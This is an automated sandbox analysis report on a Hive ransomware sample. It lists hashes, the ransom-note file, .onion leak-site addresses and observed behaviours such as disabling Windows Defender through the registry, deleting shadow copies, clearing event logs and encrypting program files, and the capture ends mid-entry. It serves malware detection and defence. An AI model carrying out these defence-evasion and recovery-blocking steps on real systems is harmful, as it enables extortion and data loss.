Analysis
-
max time kernel
152s -
max time network
132s -
platform
windows7_x64 -
resource
win7-en-20211208 -
submitted
12-01-2022 14:43
Static task
static1
Behavioral task
behavioral1
Sample
4a484842f4376660894109a2123cd4e1917193efcce9b776e8c769fc667c05b3.bin.sample.exe
Resource
win7-en-20211208
Behavioral task
behavioral2
Sample
4a484842f4376660894109a2123cd4e1917193efcce9b776e8c769fc667c05b3.bin.sample.exe
Resource
win10-en-20211208
General
-
Target
4a484842f4376660894109a2123cd4e1917193efcce9b776e8c769fc667c05b3.bin.sample.exe
-
Size
3.8MB
-
MD5
cc827025f0fc7997097626f534635501
-
SHA1
9434cc56f7e8b0a246dbc3a799e7850cdb87c9c5
-
SHA256
4a484842f4376660894109a2123cd4e1917193efcce9b776e8c769fc667c05b3
-
SHA512
855159b33f3fb2d859dcfd5468d1bfd5b3b2a6258c80a6bc0e1b98ca38b8e8c3161893307c0726f611dc4709c734c89931893db9b6529353257e916e589c5d8c
Malware Config
Extracted
C:\wPfq_HOW_TO_DECRYPT.txt
hive
http://hiveleakdbtnp76ulyhi52eag6c6tyc3xw7ez7iqy6wc34gd2nekazyd.onion/
http://hivecust6vhekztbqgdnkks64ucehqacge3dij3gyrrpdp57zoq3ooqd.onion/
Signatures
-
Deletes Windows Defender Definitions 2 TTPs 1 IoCs
Uses mpcmdrun utility to delete all AV definitions.
Processes:
MpCmdRun.exepid process 320 MpCmdRun.exe -
Hive
A ransomware written in Golang first seen in June 2021.
-
Modifies security service 2 TTPs 1 IoCs
Processes:
reg.exedescription ioc process Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\WinDefend\Start = "4" reg.exe -
Clears Windows event logs 1 TTPs
-
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
-
Modifies boot configuration data using bcdedit 1 TTPs 2 IoCs
Processes:
bcdedit.exebcdedit.exepid process 1696 bcdedit.exe 936 bcdedit.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Drops file in Program Files directory 64 IoCs
Processes:
4a484842f4376660894109a2123cd4e1917193efcce9b776e8c769fc667c05b3.bin.sample.exedescription ioc process File opened for modification C:\Program Files (x86)\Windows Sidebar\Gadgets\Clock.Gadget\images\settings_right_disabled.png 4a484842f4376660894109a2123cd4e1917193efcce9b776e8c769fc667c05b3.bin.sample.exe File opened for modification C:\Program Files\Common Files\System\msadc\de-DE\msadcor.dll.mui 4a484842f4376660894109a2123cd4e1917193efcce9b776e8c769fc667c05b3.bin.sample.exe File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\Shatter\NavigationRight_ButtonGraphic.png 4a484842f4376660894109a2123cd4e1917193efcce9b776e8c769fc667c05b3.bin.sample.exe File opened for modification C:\Program Files\Windows Sidebar\Gadgets\SlideShow.Gadget\images\pause_hov.png 4a484842f4376660894109a2123cd4e1917193efcce9b776e8c769fc667c05b3.bin.sample.exe File opened for modification C:\Program Files (x86)\Common Files\microsoft shared\THEMES14\CASCADE\CASCADE.INF.NdChF7tYzXgqR0joTxWtWzSm7a-MmTGX8zJOctsBxPv_AAAAAAAAAAA0.vl6ia 4a484842f4376660894109a2123cd4e1917193efcce9b776e8c769fc667c05b3.bin.sample.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveProjectToolset\ProjectTaskIcon.jpg.NdChF7tYzXgqR0joTxWtWzSm7a-MmTGX8zJOctsBxPv_AAAAAAAAAAA0.vl6ia 4a484842f4376660894109a2123cd4e1917193efcce9b776e8c769fc667c05b3.bin.sample.exe File opened for modification C:\Program Files (x86)\Windows Defender\ja-JP\MpAsDesc.dll.mui 4a484842f4376660894109a2123cd4e1917193efcce9b776e8c769fc667c05b3.bin.sample.exe File opened for modification C:\Program Files\Common Files\System\Ole DB\es-ES\sqloledb.rll.mui 4a484842f4376660894109a2123cd4e1917193efcce9b776e8c769fc667c05b3.bin.sample.exe File opened for modification C:\Program Files\Java\jre7\lib\deploy\splash.gif.NdChF7tYzXgqR0joTxWtWzSm7a-MmTGX8zJOctsBxPv_AAAAAAAAAAA0.vl6ia 4a484842f4376660894109a2123cd4e1917193efcce9b776e8c769fc667c05b3.bin.sample.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\1033\GROOVE_F_COL.HXK.NdChF7tYzXgqR0joTxWtWzSm7a-MmTGX8zJOctsBxPv_AAAAAAAAAAA0.vl6ia 4a484842f4376660894109a2123cd4e1917193efcce9b776e8c769fc667c05b3.bin.sample.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\OutlookAutoDiscover\PRODIGY.NET.XML.NdChF7tYzXgqR0joTxWtWzSm7a-MmTGX8zJOctsBxPv_AAAAAAAAAAA0.vl6ia 4a484842f4376660894109a2123cd4e1917193efcce9b776e8c769fc667c05b3.bin.sample.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.publisher.eclipse.nl_ja_4.4.0.v20140623020002.jar.NdChF7tYzXgqR0joTxWtWzSm7a-MmTGX8zJOctsBxPv_IAAAACAAAAA0.vl6ia 4a484842f4376660894109a2123cd4e1917193efcce9b776e8c769fc667c05b3.bin.sample.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Africa\Nairobi.NdChF7tYzXgqR0joTxWtWzSm7a-MmTGX8zJOctsBxPv_IAAAACAAAAA0.vl6ia 4a484842f4376660894109a2123cd4e1917193efcce9b776e8c769fc667c05b3.bin.sample.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\ar\LC_MESSAGES\vlc.mo.NdChF7tYzXgqR0joTxWtWzSm7a-MmTGX8zJOctsBxPv_AAAAAAAAAAA0.vl6ia 4a484842f4376660894109a2123cd4e1917193efcce9b776e8c769fc667c05b3.bin.sample.exe File opened for modification C:\Program Files (x86)\Microsoft Office\MEDIA\CAGCAT10\J0233070.WMF.NdChF7tYzXgqR0joTxWtWzSm7a-MmTGX8zJOctsBxPv_AAAAAAAAAAA0.vl6ia 4a484842f4376660894109a2123cd4e1917193efcce9b776e8c769fc667c05b3.bin.sample.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\html\dcommon\html\wPfq_HOW_TO_DECRYPT.txt 4a484842f4376660894109a2123cd4e1917193efcce9b776e8c769fc667c05b3.bin.sample.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\PAGESIZE\PGLBL022.XML.NdChF7tYzXgqR0joTxWtWzSm7a-MmTGX8zJOctsBxPv_AAAAAAAAAAA0.vl6ia 4a484842f4376660894109a2123cd4e1917193efcce9b776e8c769fc667c05b3.bin.sample.exe File opened for modification C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\IDE\VSTA\ItemTemplates\VisualBasic\1033\SettingsInternal.zip.NdChF7tYzXgqR0joTxWtWzSm7a-MmTGX8zJOctsBxPv_AAAAAAAAAAA0.vl6ia 4a484842f4376660894109a2123cd4e1917193efcce9b776e8c769fc667c05b3.bin.sample.exe File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\Memories\background.png 4a484842f4376660894109a2123cd4e1917193efcce9b776e8c769fc667c05b3.bin.sample.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.rjmx.ja_5.5.0.165303.jar.NdChF7tYzXgqR0joTxWtWzSm7a-MmTGX8zJOctsBxPv_IAAAACAAAAA0.vl6ia 4a484842f4376660894109a2123cd4e1917193efcce9b776e8c769fc667c05b3.bin.sample.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.e4.ui.workbench.addons.swt.nl_zh_4.4.0.v20140623020002.jar.NdChF7tYzXgqR0joTxWtWzSm7a-MmTGX8zJOctsBxPv_IAAAACAAAAA0.vl6ia 4a484842f4376660894109a2123cd4e1917193efcce9b776e8c769fc667c05b3.bin.sample.exe File opened for modification C:\Program Files (x86)\Common Files\microsoft shared\MSInfo\de-DE\msinfo32.exe.mui 4a484842f4376660894109a2123cd4e1917193efcce9b776e8c769fc667c05b3.bin.sample.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0304853.WMF.NdChF7tYzXgqR0joTxWtWzSm7a-MmTGX8zJOctsBxPv_AAAAAAAAAAA0.vl6ia 4a484842f4376660894109a2123cd4e1917193efcce9b776e8c769fc667c05b3.bin.sample.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\ADDINS\MSOSEC.XML.NdChF7tYzXgqR0joTxWtWzSm7a-MmTGX8zJOctsBxPv_AAAAAAAAAAA0.vl6ia 4a484842f4376660894109a2123cd4e1917193efcce9b776e8c769fc667c05b3.bin.sample.exe File opened for modification C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\docked_black_moon-waxing-gibbous_partly-cloudy.png 4a484842f4376660894109a2123cd4e1917193efcce9b776e8c769fc667c05b3.bin.sample.exe File created C:\Program Files\VideoLAN\VLC\locale\zh_CN\LC_MESSAGES\wPfq_HOW_TO_DECRYPT.txt 4a484842f4376660894109a2123cd4e1917193efcce9b776e8c769fc667c05b3.bin.sample.exe File created C:\Program Files (x86)\Common Files\microsoft shared\THEMES14\INDUST\wPfq_HOW_TO_DECRYPT.txt 4a484842f4376660894109a2123cd4e1917193efcce9b776e8c769fc667c05b3.bin.sample.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.historicaldata.zh_CN_5.5.0.165303.jar.NdChF7tYzXgqR0joTxWtWzSm7a-MmTGX8zJOctsBxPv_AAAAAAAAAAA0.vl6ia 4a484842f4376660894109a2123cd4e1917193efcce9b776e8c769fc667c05b3.bin.sample.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\1033\PSRCHLEX.DAT.NdChF7tYzXgqR0joTxWtWzSm7a-MmTGX8zJOctsBxPv_AAAAAAAAAAA0.vl6ia 4a484842f4376660894109a2123cd4e1917193efcce9b776e8c769fc667c05b3.bin.sample.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\FormsStyles\Adobe.css.NdChF7tYzXgqR0joTxWtWzSm7a-MmTGX8zJOctsBxPv_AAAAAAAAAAA0.vl6ia 4a484842f4376660894109a2123cd4e1917193efcce9b776e8c769fc667c05b3.bin.sample.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\PAGESIZE\PGMN105.XML.NdChF7tYzXgqR0joTxWtWzSm7a-MmTGX8zJOctsBxPv_AAAAAAAAAAA0.vl6ia 4a484842f4376660894109a2123cd4e1917193efcce9b776e8c769fc667c05b3.bin.sample.exe File opened for modification C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\docked_black_moon-waning-crescent.png 4a484842f4376660894109a2123cd4e1917193efcce9b776e8c769fc667c05b3.bin.sample.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.docs_5.5.0.165303.jar.NdChF7tYzXgqR0joTxWtWzSm7a-MmTGX8zJOctsBxPv_AAAAAAAAAAA0.vl6ia 4a484842f4376660894109a2123cd4e1917193efcce9b776e8c769fc667c05b3.bin.sample.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\config\Modules\org-netbeans-core-execution.xml_hidden.NdChF7tYzXgqR0joTxWtWzSm7a-MmTGX8zJOctsBxPv_AAAAAAAAAAA0.vl6ia 4a484842f4376660894109a2123cd4e1917193efcce9b776e8c769fc667c05b3.bin.sample.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\locale\com-sun-tools-visualvm-jvmstat_zh_CN.jar.NdChF7tYzXgqR0joTxWtWzSm7a-MmTGX8zJOctsBxPv_IAAAACAAAAA0.vl6ia 4a484842f4376660894109a2123cd4e1917193efcce9b776e8c769fc667c05b3.bin.sample.exe File opened for modification C:\Program Files\Windows Sidebar\Gadgets\MediaCenter.Gadget\fr-FR\gadget.xml 4a484842f4376660894109a2123cd4e1917193efcce9b776e8c769fc667c05b3.bin.sample.exe File opened for modification C:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\es-ES\js\localizedStrings.js 4a484842f4376660894109a2123cd4e1917193efcce9b776e8c769fc667c05b3.bin.sample.exe File opened for modification C:\Program Files (x86)\Windows Sidebar\Gadgets\Calendar.Gadget\images\rings-desk.png 4a484842f4376660894109a2123cd4e1917193efcce9b776e8c769fc667c05b3.bin.sample.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-swing-plaf_zh_CN.jar.NdChF7tYzXgqR0joTxWtWzSm7a-MmTGX8zJOctsBxPv_AAAAAAAAAAA0.vl6ia 4a484842f4376660894109a2123cd4e1917193efcce9b776e8c769fc667c05b3.bin.sample.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\th\LC_MESSAGES\vlc.mo.NdChF7tYzXgqR0joTxWtWzSm7a-MmTGX8zJOctsBxPv_AAAAAAAAAAA0.vl6ia 4a484842f4376660894109a2123cd4e1917193efcce9b776e8c769fc667c05b3.bin.sample.exe File opened for modification C:\Program Files\Java\jre7\lib\management\snmp.acl.template.NdChF7tYzXgqR0joTxWtWzSm7a-MmTGX8zJOctsBxPv_AAAAAAAAAAA0.vl6ia 4a484842f4376660894109a2123cd4e1917193efcce9b776e8c769fc667c05b3.bin.sample.exe File opened for modification C:\Program Files\Windows Media Player\de-DE\wmlaunch.exe.mui 4a484842f4376660894109a2123cd4e1917193efcce9b776e8c769fc667c05b3.bin.sample.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Document Themes 14\Apothecary.thmx.NdChF7tYzXgqR0joTxWtWzSm7a-MmTGX8zJOctsBxPv_AAAAAAAAAAA0.vl6ia 4a484842f4376660894109a2123cd4e1917193efcce9b776e8c769fc667c05b3.bin.sample.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\FormsStyles\Swirl\HEADER.GIF.NdChF7tYzXgqR0joTxWtWzSm7a-MmTGX8zJOctsBxPv_IAAAACAAAAA0.vl6ia 4a484842f4376660894109a2123cd4e1917193efcce9b776e8c769fc667c05b3.bin.sample.exe File created C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\IDE\VSTA\ItemTemplates\CSharp\1033\wPfq_HOW_TO_DECRYPT.txt 4a484842f4376660894109a2123cd4e1917193efcce9b776e8c769fc667c05b3.bin.sample.exe File opened for modification C:\Program Files\Windows Sidebar\Gadgets\CPU.Gadget\en-US\cpu.html 4a484842f4376660894109a2123cd4e1917193efcce9b776e8c769fc667c05b3.bin.sample.exe File opened for modification C:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\images\undocked_black_moon-waning-crescent_partly-cloudy.png 4a484842f4376660894109a2123cd4e1917193efcce9b776e8c769fc667c05b3.bin.sample.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\FormsStyles\BabyBlue\TAB_OFF.GIF.NdChF7tYzXgqR0joTxWtWzSm7a-MmTGX8zJOctsBxPv_IAAAACAAAAA0.vl6ia 4a484842f4376660894109a2123cd4e1917193efcce9b776e8c769fc667c05b3.bin.sample.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\FormsViewAttachmentIconsMask.bmp.NdChF7tYzXgqR0joTxWtWzSm7a-MmTGX8zJOctsBxPv_AAAAAAAAAAA0.vl6ia 4a484842f4376660894109a2123cd4e1917193efcce9b776e8c769fc667c05b3.bin.sample.exe File opened for modification C:\Program Files\Java\jre7\lib\deploy\messages_zh_CN.properties.NdChF7tYzXgqR0joTxWtWzSm7a-MmTGX8zJOctsBxPv_AAAAAAAAAAA0.vl6ia 4a484842f4376660894109a2123cd4e1917193efcce9b776e8c769fc667c05b3.bin.sample.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Europe\Gibraltar.NdChF7tYzXgqR0joTxWtWzSm7a-MmTGX8zJOctsBxPv_AAAAAAAAAAA0.vl6ia 4a484842f4376660894109a2123cd4e1917193efcce9b776e8c769fc667c05b3.bin.sample.exe File opened for modification C:\Program Files (x86)\Common Files\microsoft shared\THEMES14\CAPSULES\THMBNAIL.PNG.NdChF7tYzXgqR0joTxWtWzSm7a-MmTGX8zJOctsBxPv_AAAAAAAAAAA0.vl6ia 4a484842f4376660894109a2123cd4e1917193efcce9b776e8c769fc667c05b3.bin.sample.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0099169.WMF.NdChF7tYzXgqR0joTxWtWzSm7a-MmTGX8zJOctsBxPv_AAAAAAAAAAA0.vl6ia 4a484842f4376660894109a2123cd4e1917193efcce9b776e8c769fc667c05b3.bin.sample.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH03425I.JPG.NdChF7tYzXgqR0joTxWtWzSm7a-MmTGX8zJOctsBxPv_AAAAAAAAAAA0.vl6ia 4a484842f4376660894109a2123cd4e1917193efcce9b776e8c769fc667c05b3.bin.sample.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\PAGESIZE\PGLBL092.XML.NdChF7tYzXgqR0joTxWtWzSm7a-MmTGX8zJOctsBxPv_AAAAAAAAAAA0.vl6ia 4a484842f4376660894109a2123cd4e1917193efcce9b776e8c769fc667c05b3.bin.sample.exe File opened for modification C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\15.png 4a484842f4376660894109a2123cd4e1917193efcce9b776e8c769fc667c05b3.bin.sample.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Africa\Windhoek.NdChF7tYzXgqR0joTxWtWzSm7a-MmTGX8zJOctsBxPv_IAAAACAAAAA0.vl6ia 4a484842f4376660894109a2123cd4e1917193efcce9b776e8c769fc667c05b3.bin.sample.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Mazatlan.NdChF7tYzXgqR0joTxWtWzSm7a-MmTGX8zJOctsBxPv_IAAAACAAAAA0.vl6ia 4a484842f4376660894109a2123cd4e1917193efcce9b776e8c769fc667c05b3.bin.sample.exe File opened for modification C:\Program Files (x86)\Microsoft Office\MEDIA\CAGCAT10\J0301480.WMF.NdChF7tYzXgqR0joTxWtWzSm7a-MmTGX8zJOctsBxPv_AAAAAAAAAAA0.vl6ia 4a484842f4376660894109a2123cd4e1917193efcce9b776e8c769fc667c05b3.bin.sample.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\1033\MSTORE_COL.HXC.NdChF7tYzXgqR0joTxWtWzSm7a-MmTGX8zJOctsBxPv_IAAAACAAAAA0.vl6ia 4a484842f4376660894109a2123cd4e1917193efcce9b776e8c769fc667c05b3.bin.sample.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms5\FormsPreviewTemplate.html.NdChF7tYzXgqR0joTxWtWzSm7a-MmTGX8zJOctsBxPv_AAAAAAAAAAA0.vl6ia 4a484842f4376660894109a2123cd4e1917193efcce9b776e8c769fc667c05b3.bin.sample.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Templates\1033\ApothecaryMergeLetter.dotx.NdChF7tYzXgqR0joTxWtWzSm7a-MmTGX8zJOctsBxPv_IAAAACAAAAA0.vl6ia 4a484842f4376660894109a2123cd4e1917193efcce9b776e8c769fc667c05b3.bin.sample.exe File opened for modification C:\Program Files\Windows Photo Viewer\ja-JP\ImagingDevices.exe.mui 4a484842f4376660894109a2123cd4e1917193efcce9b776e8c769fc667c05b3.bin.sample.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\1033\GrooveForms5\FormsStyles\Solutions.css.NdChF7tYzXgqR0joTxWtWzSm7a-MmTGX8zJOctsBxPv_AAAAAAAAAAA0.vl6ia 4a484842f4376660894109a2123cd4e1917193efcce9b776e8c769fc667c05b3.bin.sample.exe -
Launches sc.exe
Sc.exe is a Windows utlilty to control services on the system.
-
Interacts with shadow copies 2 TTPs 1 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
Processes:
vssadmin.exepid process 1768 vssadmin.exe -
Opens file in notepad (likely ransom note) 1 IoCs
Processes:
notepad.exepid process 2504 notepad.exe -
Runs net.exe
-
Runs ping.exe 1 TTPs 1 IoCs
-
Suspicious behavior: EnumeratesProcesses 3 IoCs
Processes:
powershell.exepowershell.exe4a484842f4376660894109a2123cd4e1917193efcce9b776e8c769fc667c05b3.bin.sample.exepid process 1904 powershell.exe 2124 powershell.exe 944 4a484842f4376660894109a2123cd4e1917193efcce9b776e8c769fc667c05b3.bin.sample.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
wevtutil.exewevtutil.exewevtutil.exewmic.exewmic.exedescription pid process Token: SeSecurityPrivilege 1120 wevtutil.exe Token: SeBackupPrivilege 1120 wevtutil.exe Token: SeSecurityPrivilege 1136 wevtutil.exe Token: SeBackupPrivilege 1136 wevtutil.exe Token: SeSecurityPrivilege 1208 wevtutil.exe Token: SeBackupPrivilege 1208 wevtutil.exe Token: SeIncreaseQuotaPrivilege 1836 wmic.exe Token: SeSecurityPrivilege 1836 wmic.exe Token: SeTakeOwnershipPrivilege 1836 wmic.exe Token: SeLoadDriverPrivilege 1836 wmic.exe Token: SeSystemProfilePrivilege 1836 wmic.exe Token: SeSystemtimePrivilege 1836 wmic.exe Token: SeProfSingleProcessPrivilege 1836 wmic.exe Token: SeIncBasePriorityPrivilege 1836 wmic.exe Token: SeCreatePagefilePrivilege 1836 wmic.exe Token: SeBackupPrivilege 1836 wmic.exe Token: SeRestorePrivilege 1836 wmic.exe Token: SeShutdownPrivilege 1836 wmic.exe Token: SeDebugPrivilege 1836 wmic.exe Token: SeSystemEnvironmentPrivilege 1836 wmic.exe Token: SeRemoteShutdownPrivilege 1836 wmic.exe Token: SeUndockPrivilege 1836 wmic.exe Token: SeManageVolumePrivilege 1836 wmic.exe Token: 33 1836 wmic.exe Token: 34 1836 wmic.exe Token: 35 1836 wmic.exe Token: SeIncreaseQuotaPrivilege 1756 wmic.exe Token: SeSecurityPrivilege 1756 wmic.exe Token: SeTakeOwnershipPrivilege 1756 wmic.exe Token: SeLoadDriverPrivilege 1756 wmic.exe Token: SeSystemProfilePrivilege 1756 wmic.exe Token: SeSystemtimePrivilege 1756 wmic.exe Token: SeProfSingleProcessPrivilege 1756 wmic.exe Token: SeIncBasePriorityPrivilege 1756 wmic.exe Token: SeCreatePagefilePrivilege 1756 wmic.exe Token: SeBackupPrivilege 1756 wmic.exe Token: SeRestorePrivilege 1756 wmic.exe Token: SeShutdownPrivilege 1756 wmic.exe Token: SeDebugPrivilege 1756 wmic.exe Token: SeSystemEnvironmentPrivilege 1756 wmic.exe Token: SeRemoteShutdownPrivilege 1756 wmic.exe Token: SeUndockPrivilege 1756 wmic.exe Token: SeManageVolumePrivilege 1756 wmic.exe Token: 33 1756 wmic.exe Token: 34 1756 wmic.exe Token: 35 1756 wmic.exe Token: SeIncreaseQuotaPrivilege 1756 wmic.exe Token: SeSecurityPrivilege 1756 wmic.exe Token: SeTakeOwnershipPrivilege 1756 wmic.exe Token: SeLoadDriverPrivilege 1756 wmic.exe Token: SeSystemProfilePrivilege 1756 wmic.exe Token: SeSystemtimePrivilege 1756 wmic.exe Token: SeProfSingleProcessPrivilege 1756 wmic.exe Token: SeIncBasePriorityPrivilege 1756 wmic.exe Token: SeCreatePagefilePrivilege 1756 wmic.exe Token: SeBackupPrivilege 1756 wmic.exe Token: SeRestorePrivilege 1756 wmic.exe Token: SeShutdownPrivilege 1756 wmic.exe Token: SeDebugPrivilege 1756 wmic.exe Token: SeSystemEnvironmentPrivilege 1756 wmic.exe Token: SeRemoteShutdownPrivilege 1756 wmic.exe Token: SeUndockPrivilege 1756 wmic.exe Token: SeManageVolumePrivilege 1756 wmic.exe Token: 33 1756 wmic.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
4a484842f4376660894109a2123cd4e1917193efcce9b776e8c769fc667c05b3.bin.sample.exenet.exenet.exenet.exenet.exenet.exenet.exenet.exenet.exedescription pid process target process PID 944 wrote to memory of 576 944 4a484842f4376660894109a2123cd4e1917193efcce9b776e8c769fc667c05b3.bin.sample.exe net.exe PID 944 wrote to memory of 576 944 4a484842f4376660894109a2123cd4e1917193efcce9b776e8c769fc667c05b3.bin.sample.exe net.exe PID 944 wrote to memory of 576 944 4a484842f4376660894109a2123cd4e1917193efcce9b776e8c769fc667c05b3.bin.sample.exe net.exe PID 576 wrote to memory of 776 576 net.exe net1.exe PID 576 wrote to memory of 776 576 net.exe net1.exe PID 576 wrote to memory of 776 576 net.exe net1.exe PID 944 wrote to memory of 1300 944 4a484842f4376660894109a2123cd4e1917193efcce9b776e8c769fc667c05b3.bin.sample.exe net.exe PID 944 wrote to memory of 1300 944 4a484842f4376660894109a2123cd4e1917193efcce9b776e8c769fc667c05b3.bin.sample.exe net.exe PID 944 wrote to memory of 1300 944 4a484842f4376660894109a2123cd4e1917193efcce9b776e8c769fc667c05b3.bin.sample.exe net.exe PID 1300 wrote to memory of 992 1300 net.exe net1.exe PID 1300 wrote to memory of 992 1300 net.exe net1.exe PID 1300 wrote to memory of 992 1300 net.exe net1.exe PID 944 wrote to memory of 640 944 4a484842f4376660894109a2123cd4e1917193efcce9b776e8c769fc667c05b3.bin.sample.exe net.exe PID 944 wrote to memory of 640 944 4a484842f4376660894109a2123cd4e1917193efcce9b776e8c769fc667c05b3.bin.sample.exe net.exe PID 944 wrote to memory of 640 944 4a484842f4376660894109a2123cd4e1917193efcce9b776e8c769fc667c05b3.bin.sample.exe net.exe PID 640 wrote to memory of 1196 640 net.exe net1.exe PID 640 wrote to memory of 1196 640 net.exe net1.exe PID 640 wrote to memory of 1196 640 net.exe net1.exe PID 944 wrote to memory of 1996 944 4a484842f4376660894109a2123cd4e1917193efcce9b776e8c769fc667c05b3.bin.sample.exe net.exe PID 944 wrote to memory of 1996 944 4a484842f4376660894109a2123cd4e1917193efcce9b776e8c769fc667c05b3.bin.sample.exe net.exe PID 944 wrote to memory of 1996 944 4a484842f4376660894109a2123cd4e1917193efcce9b776e8c769fc667c05b3.bin.sample.exe net.exe PID 1996 wrote to memory of 408 1996 net.exe net1.exe PID 1996 wrote to memory of 408 1996 net.exe net1.exe PID 1996 wrote to memory of 408 1996 net.exe net1.exe PID 944 wrote to memory of 2020 944 4a484842f4376660894109a2123cd4e1917193efcce9b776e8c769fc667c05b3.bin.sample.exe net.exe PID 944 wrote to memory of 2020 944 4a484842f4376660894109a2123cd4e1917193efcce9b776e8c769fc667c05b3.bin.sample.exe net.exe PID 944 wrote to memory of 2020 944 4a484842f4376660894109a2123cd4e1917193efcce9b776e8c769fc667c05b3.bin.sample.exe net.exe PID 2020 wrote to memory of 1432 2020 net.exe net1.exe PID 2020 wrote to memory of 1432 2020 net.exe net1.exe PID 2020 wrote to memory of 1432 2020 net.exe net1.exe PID 944 wrote to memory of 1252 944 4a484842f4376660894109a2123cd4e1917193efcce9b776e8c769fc667c05b3.bin.sample.exe net.exe PID 944 wrote to memory of 1252 944 4a484842f4376660894109a2123cd4e1917193efcce9b776e8c769fc667c05b3.bin.sample.exe net.exe PID 944 wrote to memory of 1252 944 4a484842f4376660894109a2123cd4e1917193efcce9b776e8c769fc667c05b3.bin.sample.exe net.exe PID 1252 wrote to memory of 1876 1252 net.exe net1.exe PID 1252 wrote to memory of 1876 1252 net.exe net1.exe PID 1252 wrote to memory of 1876 1252 net.exe net1.exe PID 944 wrote to memory of 1068 944 4a484842f4376660894109a2123cd4e1917193efcce9b776e8c769fc667c05b3.bin.sample.exe net.exe PID 944 wrote to memory of 1068 944 4a484842f4376660894109a2123cd4e1917193efcce9b776e8c769fc667c05b3.bin.sample.exe net.exe PID 944 wrote to memory of 1068 944 4a484842f4376660894109a2123cd4e1917193efcce9b776e8c769fc667c05b3.bin.sample.exe net.exe PID 1068 wrote to memory of 1916 1068 net.exe net1.exe PID 1068 wrote to memory of 1916 1068 net.exe net1.exe PID 1068 wrote to memory of 1916 1068 net.exe net1.exe PID 944 wrote to memory of 1012 944 4a484842f4376660894109a2123cd4e1917193efcce9b776e8c769fc667c05b3.bin.sample.exe net.exe PID 944 wrote to memory of 1012 944 4a484842f4376660894109a2123cd4e1917193efcce9b776e8c769fc667c05b3.bin.sample.exe net.exe PID 944 wrote to memory of 1012 944 4a484842f4376660894109a2123cd4e1917193efcce9b776e8c769fc667c05b3.bin.sample.exe net.exe PID 1012 wrote to memory of 1624 1012 net.exe net1.exe PID 1012 wrote to memory of 1624 1012 net.exe net1.exe PID 1012 wrote to memory of 1624 1012 net.exe net1.exe PID 944 wrote to memory of 864 944 4a484842f4376660894109a2123cd4e1917193efcce9b776e8c769fc667c05b3.bin.sample.exe sc.exe PID 944 wrote to memory of 864 944 4a484842f4376660894109a2123cd4e1917193efcce9b776e8c769fc667c05b3.bin.sample.exe sc.exe PID 944 wrote to memory of 864 944 4a484842f4376660894109a2123cd4e1917193efcce9b776e8c769fc667c05b3.bin.sample.exe sc.exe PID 944 wrote to memory of 1892 944 4a484842f4376660894109a2123cd4e1917193efcce9b776e8c769fc667c05b3.bin.sample.exe sc.exe PID 944 wrote to memory of 1892 944 4a484842f4376660894109a2123cd4e1917193efcce9b776e8c769fc667c05b3.bin.sample.exe sc.exe PID 944 wrote to memory of 1892 944 4a484842f4376660894109a2123cd4e1917193efcce9b776e8c769fc667c05b3.bin.sample.exe sc.exe PID 944 wrote to memory of 1736 944 